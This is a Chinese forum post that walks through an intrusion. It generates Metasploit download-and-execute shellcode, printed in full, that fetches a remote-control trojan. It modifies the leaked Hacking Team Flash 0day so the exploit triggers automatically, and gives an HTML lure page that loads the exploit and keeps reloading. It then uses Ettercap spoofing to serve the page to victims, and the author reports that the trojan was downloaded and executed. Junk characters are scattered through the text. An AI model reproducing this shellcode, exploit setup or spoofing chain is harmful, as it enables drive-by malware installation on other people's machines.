flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

3 q$ @) A" N1 Z 三、flash 0day之手工代码修改制作下载者实例入侵演示 6 {0 v& m# `3 h `7 e1 y; D* D; L( ~

) s! `, `( ]7 v! f, _3 x' Z. J1 W 利用到的工具： 5 y# U) G" g7 O0 U* L- a! X, e

8 r8 F- Y( X2 w8 W, K Msf & C, n2 R/ G* K" K, [3 ~

. @& M% b& m% M; P6 ] Ettercap $ L5 A' Q/ h+ r% ?/ Q; d

+ }3 {& T: j9 H0 Z! T6 E; H3 R Adobe Flash CS6 ]/ D% I" M6 \% u" |1 Z

+ j$ v3 }; E4 o( x( \5 y& [9 K Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " e# C; C$ [/ A

' R6 S( |! K5 O1 ]% k 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options % [* ^, C$ C7 H- U2 d" S y% f

0 y8 r: C1 I) x 如图： & [& o, d- L/ z6 @( @

' x& _ k/ I$ ~# ~ 5 W! v& ]5 f- b) m1 x! t

0 m# A1 l6 \$ W/ b$ `2 e! n : P% V6 [& n3 s# g$ k. j

- F* o4 [0 M( h; X1 s3 j } 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: % m; X7 y+ K$ z! @, r0 n

) h% \) ~3 a7 q6 ^/ d. \ # j0 D# e6 p+ S# e8 B! d

+ j/ m/ R7 y8 ?5 a / E6 D* p: {& w2 f* R

3 W) M3 |1 m+ Z1 \) s 然后执行generate -t dword生成shellcode，如下： 5 \7 w; A! B8 A# m, w* u

8 Q v" e1 [ w0 m0 S c9 l2 s' x $ L! @# O" q" ]3 {- I

2 _7 U# @1 e" T" K% U, w4 `+ z9 {3 O 复制代码到文本下便于我们一会编辑flash exp，如下： ; I" q( {" }! L. Y

7 r( z9 V* u" P' a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 t% @$ M. m: x, H5 `; w9 j

3 Z( C; X# ~$ O" U 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 8 G, K6 z0 E, j( J

$ T3 [6 N* d! Y9 c! m4 p: T 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! W$ d+ E* ?4 }

. d# T( E$ ^0 v# L: F/ f 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + w: g) g$ d) w$ q5 @

& o S, B( n% p) ]. p 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, F" E G3 u8 ?! H- y' U

* |8 N2 t6 N9 t0 }% y8 ] 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, & T$ C5 }! G- f6 @

' v8 {! m2 I3 C' H: o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ) r Q8 s5 g* }! p1 S. o4 S9 @; h

* j6 z. a7 t3 t5 k! e 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ! D- v7 w7 U' U! y5 Q

, K: X* ~7 G' H& } 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 4 X* T& y9 A9 n3 @9 `0 @

. w" U( a$ t1 a1 i 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 5 Z* z* b1 ^1 @& {. f9 `

/ _7 \! a& y/ k+ g p) i' g 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - W& l: g# ]# u; L- l9 @

3 N. [8 l1 E# ^8 ?3 ^' E 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + T, C! f& s3 {, c

7 Y% G8 t# T. N& A 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ; v% C) B7 Y2 }$ V

. L4 b. N* ?1 y1 T# h& o- ]# { 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 , ~, N* L# v4 a( w8 V1 C- ?

( X, k! M: k5 F2 w 1 o/ V0 }0 x& G/ J% G% D6 q

7 y V( k4 ^4 c R ( D- b) e* H* o6 y9 t0 Q

0 n( d! ?8 c$ N2 M5 Z 下面我们来修改flash 0day exp，需要修改三个文件，分别为： . ?7 U3 S: d* ]; A7 r5 e2 s% \! v% C y

+ A' S, |& W) M# X8 d / G8 _' a/ s) |* ^1 j

, W! o' k3 b' V5 H3 ] 先修改ShellWin32.as，部分源代码如图： - A( @1 f2 J; t7 o" f0 ^, c

+ t1 S- f5 q! n& m% I! D + b4 x+ @: O! Y, ^7 o! Q# g

. \$ |1 E6 o/ g. {$ A 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： ) K/ c8 f5 W+ ~7 l. n9 ~* K) w, Y

) a( v3 \) W x( n# U / U, p; g1 L- w7 ^$ B

& h3 c% |4 J% u1 D% E% L& ?5 q 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： * V8 K& e7 L) ]( g/ V

9 e/ C7 N, N9 p7 H: {: p' B 1 Y l7 _% A- B3 k- A

6 o( a/ Y2 [5 l1 U: v 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： 8 V- g/ I" c4 J+ r0 l

4 X9 G2 s) j) j* Q : w4 ]) P! X I/ b6 t, ^2 ^# p

' r7 w% b" @4 s! P $ w& V; ?5 v* _0 K3 }( ^

6 O& T- w% ?3 ~0 R; a . R9 c- q4 T1 [* b7 W* Z

3 ]" h( J/ V/ c; O! g 然后点保存，下面我们来编译一下，打开 . C- f( s9 F/ y3 s* t+ Y" U

4 i6 r, O7 [/ A- ]: x: o# [, w exp1.fla然后点文件-发布，看看编译没错误 5 R8 e& z- l! F% r6 N5 I6 O

( o3 ?$ Z- v5 |1 L" C Q$ [9 m0 \" m , ]+ Y# z( ~0 V2 h% w0 w' s" i% u

. _8 u R2 f# g& L + M! ?2 y) E G* h5 p7 C% J5 _8 W

6 e" g5 p& i+ t8 x + y- F1 l) j6 B" M, S6 z

+ t. j% L+ }! B4 X/ R 3 L x7 I0 G8 p A

0 l* d* Y! x5 r7 Z+ A 然后我们把生成的 ) ?& p% w0 ?8 }. Y; @

7 @+ B# y5 T6 ~: _ exp1.swf丢到kailinux 的/var/www/html下： ) u, j B' W8 R: R0 n

) }. M% }! m) F 然后把这段代码好好编辑一下 ) E9 ^4 p0 n; O( g

! j: s3 p0 ?7 | , V9 `$ T q) \4 t( n8 C

3 J9 C" M0 i( E O! J! ~ ' v! }' @- {# `& d: P6 \4 J/ f

" V x$ g$ i4 D5 @ : O" C- U |9 \

% G3 |3 J3 z2 ?" m7 n' \# n3 E7 I % k4 s9 I! L/ I+ O, M7 Q- _* N5 D: G

( a: p0 P8 L+ P3 ~ # V$ `$ ^5 h& j2 ?7 R

* m1 ]# m1 f* e0 U' m/ v 0 y8 n" }! h! ]

; Z1 R: L& N# X) q( r3 `7 ^9 m <!DOCTYPE html> 3 z* r1 ?% s1 `0 z5 G& Q

$ t9 l9 x8 \" e# {: [ <html> 4 ?4 A* I( R+ k0 T. F! E+ P

5 i4 `' r' y$ R( q( o <head> 0 _, ^5 F! O" e# |

$ l, J0 O4 l3 \ N& [) g <meta http-equiv="Content-Type" content="text/html; f1 O; W# B! C0 t9 _0 K

6 \8 ?+ I2 v, G4 B' g- Z# D2 d* t charset=utf-8"/> % r0 h# U( {- }" v% `( X2 c, o( g

7 q, g2 h3 S; @* l5 u n </head> / q9 J2 I* y( M% H& Y

2 @$ C7 y( u& r <body> 7 V$ T$ ^- E2 j! ~

+ F- H: n9 p: Z/ X4 k* A <h2> Please wait, the requested page is loading...</h2> $ b& \4 W3 \# _1 X! a3 F

/ o' F) s8 H, d0 A <br> ; a x3 q* |( u R

& m7 i [2 i" {2 k; R1 O# J$ ^+ B$ i' H <OBJECT + t. q* Z% U9 |+ m6 w- s( d( F

; J# h# @' ]: S, e- l5 z4 Z classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie % a+ B" R. q7 S _2 X# G2 C5 }" S3 D

3 T# b7 I; s- n% m2 s* [$ C" L/ O VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 3 l7 g6 K7 `: ~- l5 u

5 M1 G3 ?0 ~3 G) i* ], H/ U </body> 0 o, s; v, e1 s4 a0 w! ?, h

7 [9 m; b6 f0 P+ l" Q9 r$ { <script> . z! F0 {5 R2 L6 I8 q3 P0 l

2 g' m X) f& k* V setTimeout(function () { % c/ A6 g& G1 d2 k; _

7 K/ g! d$ V4 w9 S 9 r" D$ U1 B; D7 v3 h

& z. r: U0 s+ w/ Y6 l0 E window.location.reload(); 4 [6 o8 `' G4 t3 a$ G

1 t, m7 E' [( _7 _ v W }, 10000); & V/ J/ A! m& V# d' [9 s1 H1 o" Z9 H3 e

' U% g, D6 J: s* R7 e# Q- j 2 m2 L5 y% x t! T% ]6 \, U

4 k1 P( @7 F4 c$ d </script> 7 g: M* y" ]( g" i

4 O$ l: [3 `7 r6 y </html> + g5 o, }7 Z) k- J6 \2 v5 D

0 s' Q* V4 L/ l- m 2 Y" d9 D3 e2 a; n" k

. K9 \" \* o4 g6 q. s' J 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： 5 w% W0 O2 A& x

3 {2 R& H; F+ o1 e 4 u3 d' N" H- a# ^& x

, X5 t& j, Y" j) k 7 m& K" I( e; B

& T8 Q9 M1 j$ n/ ~. t* M ; a+ {5 C! X, s- ^2 m' F* ?

: d' W' G$ u3 q& ?# L" p' K M& l' S + ^/ g0 M* n: x: T! X

3 Z8 h9 r; a! ^7 D8 [ 8 W0 y/ Q5 l9 t( G

+ B, {) B" ?; D1 B( c+ z 下面我们用ettercap欺骗如图： * w9 G( x9 ^9 j. n1 P) v& e$ h

% p% y3 n% Q: h) D5 p* ? - j) l6 K/ u1 }4 q3 O

3 J, s+ @ T7 p+ |0 K : l. d( S1 j1 }! p$ }

5 z' t5 j; z3 d+ B' _/ z | 下面我们随便访问个网站看看： 3 o4 g1 I/ n( A) z

, d9 ]& W( N# H: ] 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： 5 p. Z8 `. x% I+ J' G5 L; W

/ N8 [! }* r: @3 f$ \ - X) W- k7 Y# z& ]2 [

/ F. ]: J( G" F( y4 y0 L" x 我们看另一台， " a8 \ u L# c3 U5 z

/ I& g; t2 k+ }& o6 ? 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 $ {9 m# ?4 ]+ B* ]. d8 Q3 \

		自动登录	找回密码
密码			立即注册